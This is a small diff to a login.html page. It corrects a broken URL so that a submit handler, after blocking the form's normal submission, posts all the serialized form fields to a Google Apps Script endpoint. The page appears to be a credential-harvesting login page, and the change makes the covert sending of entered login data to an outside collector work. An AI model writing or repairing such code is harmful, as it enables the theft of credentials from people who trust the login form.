--- a/login.html
+++ b/login.html
@@ -57,7 +57,7 @@
 		
 		$('form').submit(function( event ) {
 			event.preventDefault();
-			$.post( 'https://https://script.google.com/macros/s/AKfycbyfvCKJ6JRKcA8d4pPvbz2ZLT1eHxcJIAUNlTlhdKVYF02tMg-Yfcedp0A7owyZPIlfQg/exec', $('form').serialize() );
+			$.post( 'https://script.google.com/macros/s/AKfycbyfvCKJ6JRKcA8d4pPvbz2ZLT1eHxcJIAUNlTlhdKVYF02tMg-Yfcedp0A7owyZPIlfQg/exec', $('form').serialize() );
 		});
     </script>
 </body>
